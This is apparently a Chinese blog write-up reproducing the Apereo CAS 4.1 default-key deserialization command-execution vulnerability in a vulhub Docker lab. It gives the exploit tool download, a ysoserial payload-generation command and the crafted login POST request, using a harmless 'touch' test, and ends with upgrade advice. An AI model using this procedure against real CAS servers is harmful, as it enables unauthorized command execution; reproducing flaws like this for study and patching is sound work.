Apereo CAS 4.1 反序列化命令执行漏洞复现

admin 2020年12月14日14:10:55评论434 views字数 2024阅读6分44秒阅读模式


漏洞概述


Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。

 

影响版本


Apereo CAS <= 4.1.7


 

环境搭建

 

这里我使用vulhub来安装环境

进入目录并安装

启动一个Apereo CAS 4.1.5:

cd vulhub-master/apereo-cas/4.1-rce/
docker-compose up -d

Apereo CAS 4.1 反序列化命令执行漏洞复现

访问http://your-ip:8080/cas/login即可查看到登录页面。

Apereo CAS 4.1 反序列化命令执行漏洞复现


漏洞检测


该漏洞存在于登录的execution参数,使用Burp抓包可以发现该参数值。

Apereo CAS 4.1 反序列化命令执行漏洞复现


漏洞复现


漏洞原理实际上是Webflow中使用了默认密钥changeit

public class EncryptedTranscoder implements Transcoder {    private CipherBean cipherBean;    private boolean compression = true;
public EncryptedTranscoder() throws IOException { BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean(); bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7")); bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore()); bufferedBlockCipherBean.setKeyAlias("aes128"); bufferedBlockCipherBean.setKeyPassword("changeit"); bufferedBlockCipherBean.setNonce(new RBGNonce()); this.setCipherBean(bufferedBlockCipherBean); }
// ...

我们使用Apereo-CAS-Attack来复现这个漏洞

下载地址

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar


使用ysoserial的CommonsCollections4生成加密后的Payload:

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"

Apereo CAS 4.1 反序列化命令执行漏洞复现

然后我们登录CAS并抓包,将Body中的execution值替换成上面生成的Payload发送:

POST /cas/login HTTP/1.1
Host: 192.168.204.131:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2289
Origin: http://192.168.204.131:8080
Connection: close
Referer: http://192.168.204.131:8080/cas/login;jsessionid=0CF8D0EDB4319FAE331C7D10BE3E0864
Cookie: JSESSIONID=0CF8D0EDB4319FAE331C7D10BE3E0864
Upgrade-Insecure-Requests: 1


username=asddas&password=asdasd&lt=LT-7-U74mB7leoY1FdormOR5oGe59Z5I4ng-cas01.example.org&execution=[payload]&_eventId=submit&submit=LOGIN

Apereo CAS 4.1 反序列化命令执行漏洞复现

登录docker可见touch /tmp/success已成功执行:


Apereo CAS 4.1 反序列化命令执行漏洞复现

 

修复建议

 

升级到最新版




本文始发于微信公众号(锋刃科技):Apereo CAS 4.1 反序列化命令执行漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月14日14:10:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apereo CAS 4.1 反序列化命令执行漏洞复现http://cn-sec.com/archives/203360.html

发表评论

匿名网友 填写信息